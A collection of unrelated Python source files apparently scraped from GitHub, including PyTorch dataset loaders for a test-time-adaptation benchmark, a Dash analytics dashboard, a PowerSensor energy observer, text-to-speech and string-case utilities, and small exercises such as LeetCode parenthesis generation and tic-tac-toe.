transforms.Compose([transforms.ToTensor()])\n elif dataset_name == \"imagenet_c\":\n # note that ImageNet-C is already resized an centre cropped\n transform = transforms.Compose([transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize])\n else:\n # use classical ImageNet transformation procedure\n transform = transforms.Compose([\n transforms.Resize((256, 256)),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize\n ])\n\n return transform\n\n\ndef load_imagenet_c(root, corruption, transforms, level=5, batch_size=64, workers=4, ckpt=None):\n assert os.path.exists(root), f'Path {root} does not exist'\n assert corruption in ['brightness', 'contrast', 'defocus_blur', 
'elastic_transform', 'fog', 'frost',\n 'gaussian_blur', 'gaussian_noise', 'glass_blur', 'impulse_noise', 'jpeg_compression',\n 'motion_blur', 'pixelate', 'saturate', 'shot_noise', 'snow', 'spatter', 'speckle_noise',\n 'zoom_blur'], f'Unknown corruption: {corruption}'\n\n validdir = os.path.join(root, corruption, str(level))\n teset = SelectedRotateImageFolder(validdir, transforms, original=False,\n rotation=False)\n\n ckpt_dir = os.path.join(ckpt, 'imagenet_c')\n if not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\n ckpt_path = os.path.join(ckpt_dir, 'list.pickle')\n if not os.path.exists(ckpt_path):\n idx = torch.randperm(len(teset))\n idx = [i.item() for i in idx]\n with open(ckpt_path, 'wb') as f:\n pickle.dump(idx, f)\n else:\n with open(ckpt_path, 'rb') as f:\n idx = pickle.load(f)\n teset.samples = [teset.samples[i] for i in idx]\n teset.switch_mode(True, False)\n teloader = torch.utils.data.DataLoader(teset, batch_size=batch_size, shuffle=False,\n num_workers=workers, pin_memory=True)\n\n return teset, teloader\n\n\ndef load_cifar10_c(root, corruption, level=5, batch_size=64, workers=4, transforms=None, ckpt=None):\n assert os.path.exists(root), f'Path {root} does not exist'\n assert corruption in ['brightness', 'contrast', 'defocus_blur', 'elastic_transform', 'fog', 'frost',\n 'gaussian_blur', 'gaussian_noise', 'glass_blur', 'impulse_noise', 'jpeg_compression',\n 'motion_blur', 'pixelate', 'saturate', 'shot_noise', 'snow', 'spatter', 'speckle_noise',\n 'zoom_blur'], f'Unknown corruption: {corruption}'\n xtest, ytest = load_cifar10c(n_examples=10000, severity=level, data_dir=root, shuffle=False,\n corruptions=[corruption])\n teset = CustomCifarC_Dataset((xtest, ytest), transform=transforms)\n\n ckpt_dir = os.path.join(ckpt, 'cifar10_c')\n if not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\n ckpt_path = os.path.join(ckpt_dir, 'list.pickle')\n if not os.path.exists(ckpt_path):\n idx = torch.randperm(len(teset))\n idx = [i.item() for i in idx]\n with open(ckpt_path, 'wb') as f:\n pickle.dump(idx, f)\n else:\n with open(ckpt_path, 'rb') as f:\n idx = pickle.load(f)\n teset = torch.utils.data.Subset(teset, idx)\n\n teloader = torch.utils.data.DataLoader(teset, batch_size=batch_size, shuffle=False, num_workers=workers,\n pin_memory=True)\n return teset, teloader\n\n\ndef load_cifar100_c(root, corruption, level=5, batch_size=64, workers=4, transforms=None, ckpt=None):\n assert os.path.exists(root), f'Path {root} does not exist'\n assert corruption in ['brightness', 'contrast', 'defocus_blur', 'elastic_transform', 'fog', 'frost',\n 'gaussian_blur', 'gaussian_noise', 'glass_blur', 'impulse_noise', 'jpeg_compression',\n 'motion_blur', 'pixelate', 'saturate', 'shot_noise', 'snow', 'spatter', 'speckle_noise',\n 'zoom_blur'], f'Unknown corruption: {corruption}'\n\n xtest, ytest = load_cifar100c(n_examples=10000, severity=level, data_dir=root, shuffle=False,\n corruptions=[corruption])\n teset = CustomCifarC_Dataset((xtest, ytest), transform=transforms)\n\n ckpt_dir = os.path.join(ckpt, 'cifar100_c')\n if not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\n ckpt_path = os.path.join(ckpt_dir, 'list.pickle')\n if not os.path.exists(ckpt_path):\n idx = torch.randperm(len(teset))\n idx = [i.item() for i in idx]\n with open(ckpt_path, 'wb') as f:\n pickle.dump(idx, f)\n else:\n with open(ckpt_path, 'rb') as f:\n idx = pickle.load(f)\n teset = torch.utils.data.Subset(teset, idx)\n\n teloader = torch.utils.data.DataLoader(teset, batch_size=batch_size, shuffle=False, num_workers=workers,\n 
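# (added note) shuffle=False is deliberate here: these loaders rely on a fixed\n # random permutation that is generated once with torch.randperm and cached to\n # disk via pickle above, so repeated runs (and different methods being\n # compared) see the corruption samples in exactly the same order.\n 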
pin_memory=True)\n return teset, teloader\n\n\ndef load_cifar10(root, batch_size=64, workers=4, split=\"train\", transforms=None):\n assert os.path.exists(root), 'CIFAR10 root path does not exist: {}'.format(root)\n if split == 'train':\n dataset = torchvision.datasets.CIFAR10(root=root, train=True,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n elif split == 'val':\n dataset = torchvision.datasets.CIFAR10(root=root, train=False,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n elif split == 'all':\n dataset = torchvision.datasets.CIFAR10(root=root, train=True,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n dataset2 = torchvision.datasets.CIFAR10(root=root, train=False,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n dataset = torch.utils.data.ConcatDataset([dataset, dataset2])\n data_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True,\n num_workers=workers, pin_memory=True)\n\n return dataset, data_loader\n\n\ndef load_cifar100(root, batch_size=64, workers=4, split=\"train\", transforms=None):\n assert os.path.exists(root), 'CIFAR100 root path does not exist: {}'.format(root)\n if split == 'train':\n dataset = torchvision.datasets.CIFAR100(root=root, train=True,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n elif split == 'val':\n dataset = torchvision.datasets.CIFAR100(root=root, train=False,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n elif split == 'all':\n dataset = torchvision.datasets.CIFAR100(root=root, train=True,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n dataset2 = torchvision.datasets.CIFAR100(root=root, train=False,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n dataset = torch.utils.data.ConcatDataset([dataset, dataset2])\n else:\n raise ValueError(f'Unknown split: {split}')\n data_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True,\n num_workers=workers, pin_memory=True)\n return dataset, data_loader\n\n\ndef load_imagenet(root, batch_size=64, workers=1, split=\"val\", transforms=None, ckpt=None):\n assert os.path.exists(root), 'ImageNet root path does not exist: {}'.format(root)\n dataset = torchvision.datasets.ImageNet(root=os.path.join(root, 'ImageNet'), split=split,\n transform=te_transforms if transforms is None else transforms)\n data_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True,\n num_workers=workers, pin_memory=True)\n\n return dataset, data_loader\n\n\ndef load_domainnet126(root, domain, transforms, batch_size=64, workers=4, split='train'):\n assert os.path.exists(root), 'DomainNet root path does not exist: {}'.format(root)\n assert domain in ['clipart', 'painting', 'real', 'sketch'], f'Unknown domain: {domain}'\n\n if split == 'train':\n dataset = DomainNet126(root=root, transform=transforms, domain=domain, train=True, download=True)\n elif split == 'val':\n dataset = DomainNet126(root=root, transform=transforms, domain=domain, train=False, download=True)\n elif split == 'all':\n train_dataset = DomainNet126(root=root, transform=transforms, domain=domain, train=True,\n download=True)\n val_dataset = DomainNet126(root=root, transform=transforms, domain=domain, train=False,\n download=True)\n dataset = torch.utils.data.ConcatDataset([train_dataset, 
val_dataset])\n data_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=workers,\n pin_memory=True)\n return dataset, data_loader\n\n\ndef load_officehome(root, domain, transforms=None, batch_size=64, workers=4, split='train'):\n data_dir = os.path.join(root, 'office-home')\n\n txt_train_path = os.path.join(data_dir, domain + \"_train.pickle\")\n txt_test_path = os.path.join(data_dir, domain + \"_test.pickle\")\n\n txt_src = open(os.path.join(data_dir, domain + '_list.txt')).readlines()\n\n dsize = len(txt_src)\n tr_size = int(0.9 * dsize)\n if not os.path.exists(txt_train_path) or not os.path.exists(txt_test_path):\n tr_txt, te_txt = torch.utils.data.random_split(txt_src, [tr_size, dsize - tr_size])\n with open(txt_train_path, 'wb') as f:\n pickle.dump(tr_txt, f)\n with open(txt_test_path, 'wb') as f:\n pickle.dump(te_txt, f)\n else:\n with open(txt_train_path, 'rb') as f:\n tr_txt = pickle.load(f)\n with open(txt_test_path, 'rb') as f:\n te_txt = pickle.load(f)\n\n if split == \"train\":\n dataset = ImageList(tr_txt, transform=image_train() if transforms is None else transforms)\n elif split == \"val\":\n dataset = ImageList(te_txt, transform=image_test() if transforms is None else transforms)\n elif split == \"all\":\n all_txt = tr_txt + te_txt\n dataset = ImageList(all_txt, transform=image_test() if transforms is None else transforms)\n\n dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=workers, drop_last=False)\n return dataset, dataloader\n\n\ndef load_dataset(dataset, root, batch_size=64, workers=4, split='train', adaptation=None, domain=None,\n level=None, ckpt=None, num_aug=1, transforms=None):\n transforms = get_transform(dataset, adaptation, num_aug) if transforms is None else transforms\n if dataset == 'cifar10':\n return load_cifar10(root=root, batch_size=batch_size, workers=workers, split=split, transforms=transforms)\n elif dataset == 'cifar100':\n return load_cifar100(root=root, batch_size=batch_size, workers=workers, split=split, transforms=transforms)\n elif dataset == 'imagenet':\n return load_imagenet(root=root, batch_size=batch_size, workers=workers, split=split, transforms=transforms,\n ckpt=ckpt)\n elif dataset == 'domainnet126':\n return load_domainnet126(root=root, domain=domain, batch_size=batch_size, workers=workers, split=split,\n transforms=transforms)\n elif dataset == 'cifar10_c':\n return load_cifar10_c(root=root, corruption=domain, level=level, batch_size=batch_size, workers=workers,\n transforms=transforms, ckpt=ckpt)\n elif dataset == 'cifar100_c':\n return load_cifar100_c(root=root, corruption=domain, level=level, batch_size=batch_size, workers=workers,\n transforms=transforms, ckpt=ckpt)\n elif dataset == 'imagenet_c':\n return load_imagenet_c(root=os.path.join(root, 'ImageNet-C'), batch_size=batch_size, corruption=domain,\n level=level, workers=workers,\n transforms=transforms, ckpt=ckpt)\n elif dataset == 'officehome':\n return load_officehome(root=root, domain=domain, batch_size=batch_size, workers=workers, split=split,\n transforms=transforms)\n else:\n raise ValueError('Unknown dataset: {}'.format(dataset))\n\n\ndef load_dataset_idx(dataset, root, batch_size=64, workers=4, split='train', adaptation=None, domain=None,\n level=None, ckpt=None, num_aug=1):\n dataset, _ = load_dataset(dataset, root, batch_size, workers, split, adaptation, domain, level, ckpt, num_aug)\n dataset_idx = Dataset_Idx(dataset)\n data_loader = torch.utils.data.DataLoader(dataset_idx, 
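# (added note; Dataset_Idx is defined elsewhere in this repo, so this is an\n # assumption) it appears to wrap a dataset so that __getitem__ also yields the\n # sample index, letting adaptation methods track per-sample state across\n # batches; a minimal version of such a wrapper could look like:\n # class DatasetIdx(torch.utils.data.Dataset): # illustrative name\n # def __init__(self, base): self.base = base\n # def __len__(self): return len(self.base)\n # def __getitem__(self, i):\n # x, y = self.base[i]\n # return x, y, i\n 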
batch_size=batch_size, shuffle=False, num_workers=workers,\n drop_last=False)\n return dataset_idx, data_loader\n","repo_name":"yuyongcan/Benchmark-TTA","sub_path":"src/data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":16932,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"21"} +{"seq_id":"16059001894","text":"\"\"\"\n-*- coding: utf-8 -*-\n@File : 括号生成.py\n@Time : 2022/4/21\n@Author: Tk \n@Software: PyCharm\n核心思想:添加(后进入递归之后再pop操作,\n暴力和回溯的不同就在于验证列表是否符合规范是用额外函数验证还是在添加元素本身上做限制\n输入:\n3\n输出:\n[\"((()))\",\"(()())\",\"(())()\",\"()(())\",\"()()()\"]\n\"\"\"\n\n\n# class Solution:\n# def generateParenthesis(self, n: int):\n# def generate(A):\n# if len(A) == 2*n:\n# if valid(A):\n# # 如果A的验证没有问题,则将A连起来形成一个完整的组合\n# ans.append(\"\".join(A))\n# else:\n# A.append('(')\n# generate(A)\n# A.pop()\n# A.append(')')\n# generate(A)\n# A.pop()\n#\n# def valid(A):\n# bal = 0\n# for c in A:\n# if c == '(':\n# bal += 1\n# else:\n# bal -= 1\n# # 多余的 ) 在 ( 之前出现了,后面就不需要看了\n# if bal < 0:\n# return False\n# return bal == 0\n#\n# ans = []\n# generate([])\n# return ans\n\n\nclass Solution:\n def generateParenthesis(self, n: int):\n ans = []\n def backtrack(S, left, right):\n if len(S) == 2 * n:\n # 将S的有效性检验放到函数内部去实现,能到2*n个字符时一定是有效的\n ans.append(''.join(S))\n return\n if left < n:\n S.append('(')\n backtrack(S, left+1, right)\n S.pop()\n if right < left:\n S.append(')')\n backtrack(S, left, right+1)\n S.pop()\n\n backtrack([], 0, 0)\n return ans\n\n\nnum = int(input())\ns = Solution()\nresult = s.generateParenthesis(num)\nprint(result)\n","repo_name":"looking-for-my-magic-bean/leetcode","sub_path":"TOP100/字符串/括号生成.py","file_name":"括号生成.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72195651253","text":"import json\nimport sys\n\nmax_num = 500\n\ndata_directory = \"../data/\"\nfiles = [\"debatepedia.json\", \"debatewise.json\", \"idebate.json\", \"parliamentary.json\", \"debateorg.json\"]\n# files = [\"parliamentary.json\", \"idebate.json\"]\n\nfor f in files:\n with open(data_directory + f) as json_file:\n data = json.load(json_file)\n arg_num = 0\n iteration = 0\n result = \"\"\n for arg in data[\"arguments\"]:\n arg_num += 1\n result += \"{\\\"index\\\": {}}\\n\"\n result += json.dumps(arg)\n result += \"\\n\"\n if arg_num > max_num:\n f_write = open(data_directory + \"splits/\" + f.split(\".\")[0] + \"_\" + str(iteration) + \".json\", \"w\")\n f_write.write(result)\n f_write.close()\n iteration += 1\n arg_num = 0\n result = \"\"\n if result != \"\":\n f_write = open(data_directory + \"splits/\" + f.split(\".\")[0] + \"_\" + str(iteration) + \".json\", \"w\")\n f_write.write(result)\n f_write.close()\n\n","repo_name":"nz63paxe/IR","sub_path":"scripts/json_for_elasticsearch.py","file_name":"json_for_elasticsearch.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20003838387","text":"import dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output, State\r\nfrom web_app.app import app\r\nimport pandas as pd\r\nfrom web_app.apps.helpers.helper_functions import get_tweets, get_polarity\r\n\r\ndf = pd.read_csv(\"/mnt/data/Events/CODE19/smart-disease-prediction-dashboard/\")\r\n\r\nCOLUMNS = ['ARPU', 'Internet Usage', 'SMS Usage', 'Voice Usage']\r\n\r\nCOLORS = {\r\n 'background': 
'#1e1e2a',\r\n 'figure-background': '#28283c',\r\n 'text': '#77d1d6',\r\n}\r\n\r\nTWEET = '''Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam ex magna, aliquet in magna in, \r\n faucibus vestibulum enim. Suspendisse ut commodo augue. Proin vel facilisis sem. Quisque eget \r\n mauris eu velit dictum auctor. Fusce lacinia nisl at ultrices aliquam. Nulla urna risus.'''\r\n\r\ncustomer_id = 1\r\nMONTHS = ['August', 'September', 'October', 'November', 'December', 'January']\r\n\r\nSEGMENTS = list(df['Customer Segment'].unique())\r\n\r\n\r\ndef generate_scatter_plot(xaxis_column_name, yaxis_column_name,\r\n xaxis_type, yaxis_type):\r\n # traces = []\r\n # for i in df['Customer Segment'].unique():\r\n # df_by_segment = df[df['Customer Segment'] == i]\r\n # traces.append(dict(\r\n # x=df_by_segment[xaxis_column_name].unique(),\r\n # y=df_by_segment[yaxis_column_name].unique(),\r\n # mode='markers',\r\n # opacity=0.7,\r\n # marker={\r\n # 'size': 5,\r\n # # 'line': {'width': 0.5, 'color': 'white'}\r\n # },\r\n # name=i\r\n # ))\r\n return {\r\n # 'data': traces,\r\n 'data': [\r\n {\r\n 'x': df[xaxis_column_name].unique(),\r\n 'y': df[yaxis_column_name].unique(),\r\n # 'x': df[xaxis_column_name],\r\n # 'y': df[yaxis_column_name],\r\n 'mode': 'markers',\r\n 'marker': {\r\n 'color': COLORS['text'],\r\n 'size': 5,\r\n },\r\n },\r\n ],\r\n 'layout': {\r\n 'title': 'Customer Segments Scatter Plot',\r\n 'showlegend': False,\r\n 'colorscale': 'balance',\r\n 'legend': {\r\n 'x': 0,\r\n 'y': 1.0\r\n },\r\n 'plot_bgcolor': COLORS['figure-background'],\r\n 'paper_bgcolor': COLORS['figure-background'],\r\n 'font': {\r\n 'color': COLORS['text']\r\n },\r\n 'transition': {\r\n 'duration': 1500\r\n },\r\n 'xaxis': {\r\n 'title': xaxis_column_name,\r\n 'type': 'linear' if xaxis_type == 'Linear' else 'log',\r\n },\r\n 'yaxis': {\r\n 'title': yaxis_column_name,\r\n 'type': 'linear' if yaxis_type == 'Linear' else 'log'\r\n },\r\n }\r\n }\r\n\r\n\r\ndef generate_bar_graph():\r\n segment_dict = dict(df['Customer Segment'].value_counts())\r\n widths = [0.5] * len(list(segment_dict.values()))\r\n return {\r\n 'data': [\r\n {\r\n 'x': list(segment_dict.values()),\r\n 'y': list(segment_dict.keys()),\r\n 'name': 'Internet Usage',\r\n 'type': 'bar',\r\n 'orientation': 'h',\r\n 'width': widths,\r\n 'marker': {\r\n 'color': '#ff9d76',\r\n }\r\n },\r\n ],\r\n 'layout': {\r\n 'title': 'Distribution of Users',\r\n 'showlegend': False,\r\n 'colorscale': 'balance',\r\n # 'legend': {\r\n # 'x': 0,\r\n # 'y': 1.0\r\n # },\r\n 'plot_bgcolor': COLORS['figure-background'],\r\n 'paper_bgcolor': COLORS['figure-background'],\r\n 'font': {\r\n 'color': COLORS['text']\r\n },\r\n 'transition': {\r\n 'duration': 1500\r\n },\r\n 'xaxis': {\r\n 'title': 'Number of Customers',\r\n },\r\n 'yaxis': {\r\n 'title': 'Customer Segments',\r\n },\r\n }\r\n }\r\n\r\n\r\ndef generate_pie_chart():\r\n return {\r\n 'data': [\r\n {\r\n 'values': get_polarity(),\r\n 'type': 'pie',\r\n 'labels': ['Negative', 'Positive', 'Neutral'],\r\n 'hoverinfo': 'label+percent',\r\n 'marker': {\r\n 'colors': ['#ff9d76', '#00adb5']\r\n },\r\n },\r\n ],\r\n 'layout': {\r\n 'plot_bgcolor': COLORS['background'],\r\n 'paper_bgcolor': COLORS['background'],\r\n 'font': {\r\n 'color': COLORS['text']\r\n },\r\n 'showlegend': False,\r\n }\r\n }\r\n\r\n\r\nlayout = html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\r\n html.Strong(\r\n '''\r\n ANALYTICS DASHBOARD\r\n ''', id='customdash'),\r\n ),\r\n ], className='one-half column'),\r\n\r\n html.Div([\r\n html.Div([\r\n 
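# (added note) every dropdown/radio id declared below is wired to the scatter\r\n # plot through the @app.callback at the bottom of this file: changing any\r\n # 'crossfilter-*' control re-invokes generate_scatter_plot with the new axis\r\n # settings, and Dash swaps in the returned figure dict.\r\n 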
dcc.Dropdown(\r\n id='crossfilter-xaxis-column',\r\n options=[{'label': i, 'value': i} for i in COLUMNS],\r\n value='ARPU'\r\n ),\r\n dcc.RadioItems(\r\n id='crossfilter-xaxis-type',\r\n options=[{'label': i, 'value': i} for i in ['Linear', 'Log']],\r\n value='Linear',\r\n labelStyle={'display': 'inline-block'}\r\n )\r\n ], className='one-half column', id='xaxis'),\r\n html.Div([\r\n dcc.Dropdown(\r\n id='crossfilter-yaxis-column',\r\n options=[{'label': i, 'value': i} for i in COLUMNS],\r\n value='Internet Usage'\r\n ),\r\n dcc.RadioItems(\r\n id='crossfilter-yaxis-type',\r\n options=[{'label': i, 'value': i} for i in ['Linear', 'Log']],\r\n value='Linear',\r\n labelStyle={'display': 'inline-block'}\r\n )\r\n ], className='one-half column', id='yaxis')\r\n ], className='one-half column container')\r\n ], className='container'),\r\n\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(\r\n id='overall-scatter-plot',\r\n style={'width': '100%'},\r\n figure=generate_scatter_plot('ARPU', 'Internet Usage', 'Linear', 'Linear')\r\n )\r\n ], className='one-half column', style={'width': '48%'}),\r\n\r\n html.Div([\r\n dcc.Graph(\r\n id='overall-bar-graph',\r\n figure=generate_bar_graph()\r\n ),\r\n ], className='one-half column'),\r\n\r\n ], className='container'),\r\n\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Strong('LIVE TWEETS', id='tweet-title', className='titles', style={'float': 'left'}),\r\n html.Button([\r\n 'REFRESH'\r\n ], id='refresh-button', className='two columns'),\r\n ]),\r\n html.Div([\r\n get_tweets()\r\n ], id='tweet-container')\r\n ], className='eight columns', id='tweet-display'),\r\n html.Div([\r\n html.Strong('TWEET POLARITY', className='titles'),\r\n html.Div([\r\n dcc.Graph(\r\n id='polarity-pie-chart',\r\n figure=generate_pie_chart()\r\n )\r\n ])\r\n ], className='four columns', id='tweet-polarity-display')\r\n ], className='container'),\r\n ], id='last-div'),\r\n\r\n html.Div([\r\n html.Button([\r\n dcc.Link('PREDICTION DASHBOARD', href='/apps/customer_dashboard')\r\n ], id='page2-link', className='three columns'),\r\n ], className='container', id='page2-link-container')\r\n\r\n])\r\n\r\n\r\n@app.callback(\r\n Output('overall-scatter-plot', 'figure'),\r\n [Input('crossfilter-xaxis-column', 'value'),\r\n Input('crossfilter-yaxis-column', 'value'),\r\n Input('crossfilter-xaxis-type', 'value'),\r\n Input('crossfilter-yaxis-type', 'value')],\r\n)\r\ndef update_scatter_plot(xaxis_column, yaxis_column, xaxis_type, yaxis_type):\r\n return generate_scatter_plot(xaxis_column, yaxis_column, xaxis_type, yaxis_type)\r\n\r\n\r\n@app.callback(\r\n Output('tweet-container', 'children'),\r\n [Input('refresh-button', 'n_clicks')],\r\n # [State('customer-id', 'value')]\r\n)\r\ndef service_usage_graph(n_clicks):\r\n return get_tweets()\r\n","repo_name":"Debanitrkl/smart-disease-prediction-dashboard","sub_path":"web_app/apps/world_dashboard.py","file_name":"world_dashboard.py","file_ext":"py","file_size_in_byte":8776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74814675891","text":"# Program to concatenate arrays\r\n# J. 
Raghuramjee - 121910313004\r\n\r\n# Taking inputs\r\nn = int(input(\"Enter the number of arrays you want to concatenate : \"))\r\narr = []\r\nfor i in range(n):\r\n a = []\r\n size = int(input(\"Enter the size of array \" + str(i+1) + \" : \"))\r\n print(\"Enter the elements of array\", i+1, \":\")\r\n # use a separate loop variable so the outer index is not shadowed\r\n for j in range(size):\r\n ele = input()\r\n a.append(ele)\r\n arr.append(a)\r\n\r\n# Printing the arrays\r\nprint(\"The arrays are : \")\r\nfor i in arr:\r\n print(i)\r\n\r\n# Logic to concatenate arrays\r\nres = []\r\nfor i in arr:\r\n res += i\r\n\r\n# Printing the result\r\nprint(\"The concatenated array is :\")\r\nprint(res)\r\n\r\n\r\n","repo_name":"121910313014/pythonprograms","sub_path":"L-3 ASSIGNMENT-1-ARRAY-CONCATENATION.py","file_name":"L-3 ASSIGNMENT-1-ARRAY-CONCATENATION.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39342883141","text":"import numpy as np\n\nfrom kernel_tuner.observers.observer import BenchmarkObserver\n\n# check if powersensor is installed\ntry:\n import powersensor\nexcept ImportError:\n powersensor = None\n\n\nclass PowerSensorObserver(BenchmarkObserver):\n \"\"\"Observer that uses an external PowerSensor2 device to accurately measure power\n\n Requires PowerSensor2 hardware and powersensor Python bindings.\n\n :param observables: A list of strings, containing any of \"ps_energy\" or \"ps_power\".\n To measure energy in Joules or power consumption in Watt.\n If not passed \"ps_energy\" is used to report energy consumption of kernels in Joules.\n :type observables: list\n\n :param device: A string with the path to the PowerSensor2 device, default \"/dev/ttyACM0\".\n :type device: string\n\n \"\"\"\n\n def __init__(self, observables=None, device=None):\n if not powersensor:\n raise ImportError(\"could not import powersensor\")\n\n # apply the default before validating, so observables=None cannot crash the loop\n self.observables = observables or [\"ps_energy\"]\n supported = [\"ps_energy\", \"ps_power\"]\n for obs in self.observables:\n if obs not in supported:\n raise ValueError(f\"Observable {obs} not in supported: {supported}\")\n\n device = device or \"/dev/ttyACM0\"\n self.ps = powersensor.PowerSensor(device)\n\n self.begin_state = None\n self.results = {key: [] for key in self.observables}\n\n def after_start(self):\n self.begin_state = self.ps.read()\n\n def after_finish(self):\n end_state = self.ps.read()\n # compute the energy unconditionally: the power branch needs it too, even\n # when \"ps_energy\" itself was not requested\n ps_measured_e = powersensor.Joules(self.begin_state, end_state, -1) # Joules\n if \"ps_energy\" in self.observables:\n self.results[\"ps_energy\"].append(ps_measured_e)\n if \"ps_power\" in self.observables:\n ps_measured_t = (\n end_state.time_at_read - self.begin_state.time_at_read\n ) # seconds\n self.results[\"ps_power\"].append(ps_measured_e / ps_measured_t) # Watt\n\n def get_results(self):\n averages = {key: np.average(values) for key, values in self.results.items()}\n self.results = {key: [] for key in self.observables}\n return averages\n","repo_name":"bouweandela/kernel_tuner","sub_path":"kernel_tuner/observers/powersensor.py","file_name":"powersensor.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"34118860274","text":"import pyttsx3\r\nimport sys\r\nimport os\r\n\r\ndef is_valid_file_name(file_name):\r\n invalid_characters = \"\\\\/:*?\\\"<>|\"\r\n for character in invalid_characters:\r\n if character in file_name:\r\n return False\r\n return True\r\n\r\ndef convert_line_to_mp3(text, output_file_path):\r\n engine = 
pyttsx3.init()\r\n tts_voices = engine.getProperty('voices')\r\n engine.setProperty('voice', tts_voices[1].id)\r\n engine.save_to_file(text, output_file_path)\r\n engine.runAndWait()\r\n\r\ndef convert_dir_to_mp3(input_directory, output_directory):\r\n if not os.path.exists(input_directory):\r\n print('Input directory does not exist')\r\n sys.exit(1)\r\n if not os.path.exists(output_directory):\r\n os.makedirs(output_directory)\r\n for root, dirs, files in os.walk(input_directory):\r\n for file in files:\r\n if file.endswith(\".txt\"):\r\n file_path = os.path.join(root, file)\r\n with open(file_path, 'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n line = line.strip()\r\n if len(line) == 0:\r\n continue\r\n if is_valid_file_name(line):\r\n if line[-1] == '.': line = line[:-1]\r\n output_file_path = os.path.join(output_directory, line + '.mp3')\r\n convert_line_to_mp3(line, output_file_path)\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) != 3:\r\n print('Wrong usage, instead try: python ttsfiles.py input_directory output_directory')\r\n sys.exit(1)\r\n convert_dir_to_mp3(sys.argv[1], sys.argv[2])\r\n","repo_name":"cezar06/Python","sub_path":"proiect_tts/ttsfiles.py","file_name":"ttsfiles.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41328689640","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 21 09:35:06 2020\n\n@author: Helene Stabell\n\"\"\"\n\n\n\ndef to_camel_case(text):\n words = text.split()\n sep_camels = []\n str1 = \"\" \n \n for word in words:\n capt = word.capitalize()\n sep_camels.append(capt)\n \n return (str1.join(sep_camels)) \n \n\n## question 2b)\n \ndef to_snake_case(text):\n capitals = set('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n sep_snake = []\n str1 = \"\"\n \n for character in text:\n if character in capitals:\n c = '_' + (str(character)).lower()\n sep_snake.append(c) \n elif character.isnumeric():\n sep_snake.append('_'+character+'_')\n elif character == ' ':\n print('Wrong format dude! Try again.')\n else:\n sep_snake.append(character)\n \n output_line = str(str1.join(sep_snake))\n return (output_line[1:-1].replace('__','_'))","repo_name":"HeleneS1/checkpoint_week3","sub_path":"question_2.py","file_name":"question_2.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19142454567","text":"def create_table():\n '''\n Docstring explaines function\n DOCSTRING: information about the function\n INPUT: no input\n OUTPUT: returns list of lists to set 6x6 table to play tic tac toe\n '''\n tab = [] \n for i in range(3):\n tab.append (list(('_', '_', '_')))\n return tab\n\ndef print_table(tab):\n for i in range(3):\n print(tab[i])\n \ndef turns (tab, player, row, col):\n tab[row-1][col-1] = player\n return tab\n\ndef check_turn (tab, player, flag):\n for i in range(3):\n if tab[i][0] == tab [i][1] == tab [i][2] == player:\n flag = True\n elif tab[0][i] == tab [1][i] == tab [2][i] == player:\n flag = True\n if tab[0][0] == tab[1][1] == tab[2][2] == player or tab[0][2] == tab[1][1] == tab[2][0] == player:\n flag = True\n \n if flag:\n print_table(tab)\n if player == 'X':\n print ('Player #1 is the winner!')\n else:\n print ('Player #2 is the winner!')\n return flag\n \ndef players_turns (tab, player):\n flag = False\n while flag == False:\n row = input ('Player #{}, your turn! 
